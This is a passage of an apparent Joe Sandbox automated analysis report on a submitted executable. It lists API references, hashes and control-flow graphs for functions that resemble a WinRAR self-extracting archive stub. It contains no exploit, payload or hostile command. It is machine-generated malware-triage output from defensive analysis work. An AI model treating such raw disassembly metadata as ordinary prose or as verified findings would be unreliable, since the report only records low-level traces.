                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 42610566-0
                                                                                                    • Opcode ID: c3e4a687482a80d49879a7f3922dc6aa67fc588a40b385e35ae4e42a6a14442b
                                                                                                    • Instruction ID: 14e321851a45c1e20f941e85d358b730e5d0c3850360f7881f4c6d459b4f3433
                                                                                                    • Opcode Fuzzy Hash: c3e4a687482a80d49879a7f3922dc6aa67fc588a40b385e35ae4e42a6a14442b
                                                                                                    • Instruction Fuzzy Hash: 5F413072900619ABCB29DF68CC88AE9B7B9FB48350F1841A6F559F3240D7346ED4CF91
                                                                                                    Function 00E27DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00E27DC4,?,00E3C300,0000000C,00E27F1B,?,00000002,00000000), ref: 00E27E0F
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00E27DC4,?,00E3C300,0000000C,00E27F1B,?,00000002,00000000), ref: 00E27E16
                                                                                                    • ExitProcess.KERNEL32 ref: 00E27E28
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: c7b33eda28a0e0119d40f2743504603aebe787dd8b264e046f5f0bddbd5977c9
                                                                                                    • Instruction ID: 00605961d3cb0bb1f275bb46620ff6e59558e1226ae61e254f7d1803a35fe58a
                                                                                                    • Opcode Fuzzy Hash: c7b33eda28a0e0119d40f2743504603aebe787dd8b264e046f5f0bddbd5977c9
                                                                                                    • Instruction Fuzzy Hash: FEE04631001158EFCF026F61ED0DE4A3FAAEB40341B054498F849AA132CB36DE96EAA0
                                                                                                    Function 00E0848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 53572b78e953b7ecdeef87e79c19bd16125e2b45ae809ef4ca9c3da683c24b7a
                                                                                                    • Instruction ID: aab9c6c0e6a6789646d4a140e94900ab48ae3085cd11c26cc481556feb4b079f
                                                                                                    • Opcode Fuzzy Hash: 53572b78e953b7ecdeef87e79c19bd16125e2b45ae809ef4ca9c3da683c24b7a
                                                                                                    • Instruction Fuzzy Hash: C782F970904245AEDF15DF64C991BFABBB9AF15304F0861B9D889BB2C3DB315AC4CB60
                                                                                                    Function 00E16CDC Relevance: .3, Instructions: 343COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: eec5908edb34743013aa15a84f4cdd00de7fea0f79c7497bfd2b618ebfd93e92
                                                                                                    • Instruction ID: 14c45c7c73191cc06673f81f27f92d3846a20a5750000c9ec4fdd85af4ccce88
                                                                                                    • Opcode Fuzzy Hash: eec5908edb34743013aa15a84f4cdd00de7fea0f79c7497bfd2b618ebfd93e92
                                                                                                    • Instruction Fuzzy Hash: 7BD1B3B16083408FDB14DF28D8447DBBBE1BF89708F08556DE889AB242D774EE85CB56
                                                                                                    Function 00E1B7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E1B7E5
                                                                                                      • Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
                                                                                                      • Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E1B8D1
                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1B8EF
                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 00E1B902
                                                                                                    • TranslateMessage.USER32(?), ref: 00E1B910
                                                                                                    • DispatchMessageW.USER32(?), ref: 00E1B91A
                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00E1B93D
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00E1B960
                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 00E1B983
                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E1B99E
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E335F4), ref: 00E1B9B1
                                                                                                      • Part of subcall function 00E1D453: _wcschr.LIBVCRUNTIME ref: 00E1D45C
                                                                                                      • Part of subcall function 00E1D453: _wcslen.LIBCMT ref: 00E1D47D
                                                                                                    • SetFocus.USER32(00000000), ref: 00E1B9B8
                                                                                                    • _swprintf.LIBCMT ref: 00E1BA24
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                      • Part of subcall function 00E1D4D4: GetDlgItem.USER32(00000068,00E5FCB8), ref: 00E1D4E8
                                                                                                      • Part of subcall function 00E1D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00E1AF07,00000001,?,?,00E1B7B9,00E3506C,00E5FCB8,00E5FCB8,00001000,00000000,00000000), ref: 00E1D510
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E1D51B
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E335F4), ref: 00E1D529
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E1D53F
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E1D559
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E1D59D
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E1D5AB
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E1D5BA
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E1D5E1
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E343F4), ref: 00E1D5F0
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00E1BA68
                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00E1BA90
                                                                                                    • GetTickCount.KERNEL32 ref: 00E1BAAE
                                                                                                    • _swprintf.LIBCMT ref: 00E1BAC2
                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 00E1BAF4
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00E1BB43
                                                                                                    • _swprintf.LIBCMT ref: 00E1BB7C
                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00E1BBD0
                                                                                                    • GetCommandLineW.KERNEL32 ref: 00E1BBEA
                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00E1BC47
                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00E1BC6F
                                                                                                    • Sleep.KERNEL32(00000064), ref: 00E1BCB9
                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00E1BCE2
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E1BCEB
                                                                                                    • _swprintf.LIBCMT ref: 00E1BD1E
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E1BD7D
                                                                                                    • SetDlgItemTextW.USER32(?,00000065,00E335F4), ref: 00E1BD94
                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 00E1BD9D
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00E1BDAC
                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E1BDBB
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E1BE68
                                                                                                    • _wcslen.LIBCMT ref: 00E1BEBE
                                                                                                    • _swprintf.LIBCMT ref: 00E1BEE8
                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00E1BF32
                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00E1BF4C
                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 00E1BF55
                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00E1BF6B
                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 00E1BF85
                                                                                                    • SetWindowTextW.USER32(00000000,00E4A472), ref: 00E1BFA7
                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00E1C007
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E1C01A
                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00E1C0BD
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00E1C197
                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00E1C1D9
                                                                                                      • Part of subcall function 00E1C73F: __EH_prolog.LIBCMT ref: 00E1C744
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E1C1FD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<$STARTDLG$^$__tmp_rar_sfx_access_check_%u$h$winrarsfxmappingfile.tmp$Q
                                                                                                    • API String ID: 3829768659-4153176784
                                                                                                    • Opcode ID: 5d24595d79c27ed0db3c57cd9ba84a93b99ee41bb78e15492201107e7d28923c
                                                                                                    • Instruction ID: 59ad68a8886633105d7f6f983b70235ba00cd2c803fd375692947d051b60b1de
                                                                                                    • Opcode Fuzzy Hash: 5d24595d79c27ed0db3c57cd9ba84a93b99ee41bb78e15492201107e7d28923c
                                                                                                    • Instruction Fuzzy Hash: 0542F670984244BEEB219B71AD4AFFE77BCAB02744F142095F640F61D2CBB55AC9CB21
                                                                                                    Function 00E10863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 269 e10863-e10886 call e1ec50 GetModuleHandleW 272 e108e7-e10b48 269->272 273 e10888-e1089f GetProcAddress 269->273 274 e10c14-e10c40 GetModuleFileNameW call e0c29a call e10602 272->274 275 e10b4e-e10b59 call e275fb 272->275 276 e108a1-e108b7 273->276 277 e108b9-e108c9 GetProcAddress 273->277 293 e10c42-e10c4e call e0b146 274->293 275->274 287 e10b5f-e10b8d GetModuleFileNameW CreateFileW 275->287 276->277 278 e108e5 277->278 279 e108cb-e108e0 277->279 278->272 279->278 289 e10c08-e10c0f CloseHandle 287->289 290 e10b8f-e10b9b SetFilePointer 287->290 289->274 290->289 291 e10b9d-e10bb9 ReadFile 290->291 291->289 294 e10bbb-e10be0 291->294 298 e10c50-e10c5b call e1081b 293->298 299 e10c7d-e10ca4 call e0c310 GetFileAttributesW 293->299 297 e10bfd-e10c06 call e10371 294->297 297->289 306 e10be2-e10bfc call e1081b 297->306 298->299 308 e10c5d-e10c7b CompareStringW 298->308 309 e10ca6-e10caa 299->309 310 e10cae 299->310 306->297 308->299 308->309 309->293 312 e10cac 309->312 313 e10cb0-e10cb5 310->313 312->313 314 e10cb7 313->314 315 e10cec-e10cee 313->315 318 e10cb9-e10ce0 call e0c310 GetFileAttributesW 314->318 316 e10cf4-e10d0b call e0c2e4 call e0b146 315->316 317 e10dfb-e10e05 315->317 328 e10d73-e10da6 call e04092 AllocConsole 316->328 329 e10d0d-e10d6e call e1081b * 2 call e0e617 call e04092 call e0e617 call e1a7e4 316->329 323 e10ce2-e10ce6 318->323 324 e10cea 318->324 323->318 326 e10ce8 323->326 324->315 326->315 334 e10df3-e10df5 ExitProcess 328->334 335 e10da8-e10ded GetCurrentProcessId AttachConsole call e23e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->335 329->334 335->334
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 00E1087C
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E1088E
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E108BF
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E10B69
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E10B83
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E10B93
                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,|<,00000000), ref: 00E10BB1
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E10C09
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E10C1E
                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<,?,00000000,?,00000800), ref: 00E10C72
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,|<,00000800,?,00000000,?,00000800), ref: 00E10C9C
                                                                                                    • GetFileAttributesW.KERNEL32(?,?,D=,00000800), ref: 00E10CD8
                                                                                                      • Part of subcall function 00E1081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E10836
                                                                                                      • Part of subcall function 00E1081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E0F2D8,Crypt32.dll,00000000,00E0F35C,?,?,00E0F33E,?,?,?), ref: 00E10858
                                                                                                    • _swprintf.LIBCMT ref: 00E10D4A
                                                                                                    • _swprintf.LIBCMT ref: 00E10D96
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                    • AllocConsole.KERNEL32 ref: 00E10D9E
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00E10DA8
                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00E10DAF
                                                                                                    • _wcslen.LIBCMT ref: 00E10DC4
                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00E10DD5
                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00E10DDC
                                                                                                    • Sleep.KERNEL32(00002710), ref: 00E10DE7
                                                                                                    • FreeConsole.KERNEL32 ref: 00E10DED
                                                                                                    • ExitProcess.KERNEL32 ref: 00E10DF5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                    • String ID: (=$,<$,@$0?$0A$4B$8>$D=$DXGIDebug.dll$H?$H@$HA$P>$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=$`@$d?$dA$dwmapi.dll$h=$h>$kernel32$uxtheme.dll$|<$|?$|@$<$>$?$@$A
                                                                                                    • API String ID: 1207345701-31210346
                                                                                                    • Opcode ID: e97dfcc90bd267bf36f67200c4535075f61cd890e47231951f27cdfa6b663f92
                                                                                                    • Instruction ID: 687411e77542449606ba9360fc43cf917f5bf3b88a53b27fd5d72d2bc55de64f
                                                                                                    • Opcode Fuzzy Hash: e97dfcc90bd267bf36f67200c4535075f61cd890e47231951f27cdfa6b663f92
                                                                                                    • Instruction Fuzzy Hash: 0FD163B1108384AFD3259F61984EEDFBEE8BBC5704F50691DF185B6190C7B49688CFA2
                                                                                                    Function 00E1C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428windowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 348 e1c73f-e1c757 call e1eb78 call e1ec50 353 e1d40d-e1d418 348->353 354 e1c75d-e1c787 call e1b314 348->354 354->353 357 e1c78d-e1c792 354->357 358 e1c793-e1c7a1 357->358 359 e1c7a2-e1c7b7 call e1af98 358->359 362 e1c7b9 359->362 363 e1c7bb-e1c7d0 call e11fbb 362->363 366 e1c7d2-e1c7d6 363->366 367 e1c7dd-e1c7e0 363->367 366->363 368 e1c7d8 366->368 369 e1c7e6 367->369 370 e1d3d9-e1d404 call e1b314 367->370 368->370 371 e1c7ed-e1c7f0 369->371 372 e1ca7c-e1ca7e 369->372 373 e1ca5f-e1ca61 369->373 374 e1c9be-e1c9c0 369->374 370->358 385 e1d40a-e1d40c 370->385 371->370 378 e1c7f6-e1c850 call e1a64d call e0bdf3 call e0a544 call e0a67e call e06edb 371->378 372->370 376 e1ca84-e1ca8b 372->376 373->370 380 e1ca67-e1ca77 SetWindowTextW 373->380 374->370 377 e1c9c6-e1c9d2 374->377 376->370 381 e1ca91-e1caaa 376->381 382 e1c9d4-e1c9e5 call e27686 377->382 383 e1c9e6-e1c9eb 377->383 439 e1c98f-e1c9a4 call e0a5d1 378->439 380->370 386 e1cab2-e1cac0 call e23e13 381->386 387 e1caac 381->387 382->383 390 e1c9f5-e1ca00 call e1b48e 383->390 391 e1c9ed-e1c9f3 383->391 385->353 386->370 403 e1cac6-e1cacf 386->403 387->386 395 e1ca05-e1ca07 390->395 391->395 400 e1ca12-e1ca32 call e23e13 call e23e3e 395->400 401 e1ca09-e1ca10 call e23e13 395->401 422 e1ca34-e1ca3b 400->422 423 e1ca4b-e1ca4d 400->423 401->400 407 e1cad1-e1cad5 403->407 408 e1caf8-e1cafb 403->408 412 e1cb01-e1cb04 407->412 413 e1cad7-e1cadf 407->413 408->412 415 e1cbe0-e1cbee call e10602 408->415 420 e1cb11-e1cb2c 412->420 421 e1cb06-e1cb0b 412->421 413->370 418 e1cae5-e1caf3 call e10602 413->418 431 e1cbf0-e1cc04 call e2279b 415->431 418->431 434 e1cb76-e1cb7d 420->434 435 e1cb2e-e1cb68 420->435 421->415 421->420 428 e1ca42-e1ca4a call e27686 422->428 429 e1ca3d-e1ca3f 422->429 423->370 430 e1ca53-e1ca5a call e23e2e 423->430 428->423 429->428 430->370 449 e1cc11-e1cc62 call e10602 call e1b1be GetDlgItem SetWindowTextW SendMessageW call e23e49 431->449 450 e1cc06-e1cc0a 431->450 441 e1cbab-e1cbce call e23e13 * 2 434->441 442 e1cb7f-e1cb97 call e23e13 434->442 470 e1cb6a 435->470 471 e1cb6c-e1cb6e 435->471 456 e1c855-e1c869 SetFileAttributesW 439->456 457 e1c9aa-e1c9b9 call e0a55a 439->457 441->431 476 e1cbd0-e1cbde call e105da 441->476 442->441 464 e1cb99-e1cba6 call e105da 442->464 482 e1cc67-e1cc6b 449->482 450->449 455 e1cc0c-e1cc0e 450->455 455->449 458 e1c90f-e1c91f GetFileAttributesW 456->458 459 e1c86f-e1c8a2 call e0b991 call e0b690 call e23e13 456->459 457->370 458->439 468 e1c921-e1c930 DeleteFileW 458->468 491 e1c8b5-e1c8c3 call e0bdb4 459->491 492 e1c8a4-e1c8b3 call e23e13 459->492 464->441 468->439 475 e1c932-e1c935 468->475 470->471 471->434 479 e1c939-e1c965 call e04092 GetFileAttributesW 475->479 476->431 489 e1c937-e1c938 479->489 490 e1c967-e1c97d MoveFileW 479->490 482->370 486 e1cc71-e1cc85 SendMessageW 482->486 486->370 489->479 490->439 493 e1c97f-e1c989 MoveFileExW 490->493 491->457 498 e1c8c9-e1c908 call e23e13 call e1fff0 491->498 492->491 492->498 493->439 498->458
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E1C744
                                                                                                      • Part of subcall function 00E1B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00E1B3FB
                                                                                                      • Part of subcall function 00E1AF98: _wcschr.LIBVCRUNTIME ref: 00E1B033
                                                                                                    • _wcslen.LIBCMT ref: 00E1CA0A
                                                                                                    • _wcslen.LIBCMT ref: 00E1CA13
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00E1CA71
                                                                                                    • _wcslen.LIBCMT ref: 00E1CAB3
                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 00E1CBFB
